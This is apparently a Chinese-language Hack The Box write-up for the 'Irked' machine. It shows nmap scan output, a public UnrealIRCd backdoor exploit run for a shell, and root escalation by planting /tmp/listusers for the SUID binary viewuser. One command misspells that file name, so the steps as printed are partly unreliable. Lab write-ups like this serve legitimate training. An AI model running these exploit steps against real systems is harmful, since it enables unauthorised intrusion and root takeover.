0x00 信息收集

nmap -Pn -sV -T 4 -A 10.10.10.117

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn‘t have a title (text/html).
| vulners:
|   cpe:/a:apache:http_server:2.4.10:
|         CVE-2017-7679    7.5    https://vulners.com/cve/CVE-2017-7679
|         CVE-2017-7668    7.5    https://vulners.com/cve/CVE-2017-7668
|         CVE-2017-3169    7.5    https://vulners.com/cve/CVE-2017-3169
|         CVE-2017-3167    7.5    https://vulners.com/cve/CVE-2017-3167
|         CVE-2018-1312    6.8    https://vulners.com/cve/CVE-2018-1312
|         CVE-2017-15715    6.8    https://vulners.com/cve/CVE-2017-15715
|         CVE-2017-9788    6.4    https://vulners.com/cve/CVE-2017-9788
|         CVE-2019-0217    6.0    https://vulners.com/cve/CVE-2019-0217
|         CVE-2020-1927    5.8    https://vulners.com/cve/CVE-2020-1927
|         CVE-2019-10098    5.8    https://vulners.com/cve/CVE-2019-10098
|         CVE-2020-1934    5.0    https://vulners.com/cve/CVE-2020-1934
|         CVE-2019-0220    5.0    https://vulners.com/cve/CVE-2019-0220
|         CVE-2018-17199    5.0    https://vulners.com/cve/CVE-2018-17199
|         CVE-2017-9798    5.0    https://vulners.com/cve/CVE-2017-9798
|         CVE-2017-15710    5.0    https://vulners.com/cve/CVE-2017-15710
|         CVE-2016-8743    5.0    https://vulners.com/cve/CVE-2016-8743
|         CVE-2016-2161    5.0    https://vulners.com/cve/CVE-2016-2161
|         CVE-2016-0736    5.0    https://vulners.com/cve/CVE-2016-0736
|         CVE-2014-3583    5.0    https://vulners.com/cve/CVE-2014-3583
|         CVE-2019-10092    4.3    https://vulners.com/cve/CVE-2019-10092
|         CVE-2016-4975    4.3    https://vulners.com/cve/CVE-2016-4975
|         CVE-2015-3185    4.3    https://vulners.com/cve/CVE-2015-3185
|         CVE-2014-8109    4.3    https://vulners.com/cve/CVE-2014-8109
|         CVE-2018-1283    3.5    https://vulners.com/cve/CVE-2018-1283
|_        CVE-2016-8612    3.3    https://vulners.com/cve/CVE-2016-8612
111/tcp open  rpcbind 2-4 (RPC #100000)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

因为有80端口，首先浏览器打开IP，发现并没有什么信息

尝试爆破路径，未发现可以利用的路径。

唯一的信息就是IRC，因此查找IRC是一个什么服务，并且网上信息说IRC使用端口6667和6697

* IRC（Internet Relay Chat的缩写，“因特网中继聊天”）是一个位于应用层的协议。
* 其主要用于群体聊天，但同样也可以用于个人对个人的聊天。
* 一个IRC服务器可以连接其他的IRC服务器以扩展为一个IRC网络。
* IRC 不强制注册；但如果你注册了，就可以强制把占用自己唯一 ID 的人踢下线。
* IRC 协议简单，开源实现多，其第三方机器人程序非常众多，几乎每种语言都有一个实现。
* IRC 是开源社区会议标准；因此，许多开源世界的技术大牛混在那里。

使用nmap扫描6667和6697端口

PORT     STATE  SERVICE VERSION
6667/tcp closed irc
6697/tcp open   irc     UnrealIRCd
Service Info: Host: irked.htb

发现6697端口开放，并在exploit-db中发现了相关exp

0X01 漏洞利用

首先尝试寻找相关的exp
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
在程序中添加local_ip以及local_port

python3 exploit.py 10.10.10.117 6697 -payload python

0x02 权限提升

sudo -l 发现sudo命令无法识别
但是服务器中有wget，使用wget下载LinEnum.sh

[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

存在一个可疑文件 /usr/bin/viewuser

ircd@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-05-27 10:33 (:0)
sh: 1: /tmp/listusers: not found

执行该文件后，发现提示/tmp/listusers不存在，因此在/tmp目录下创建这个文件并写入bash脚本

echo /bin/bash >> listuesrs
chmod 777 listusers
/usr/bin/viewuser

Hack The Box::Lrked

原文：https://www.cnblogs.com/aya82/p/14198910.html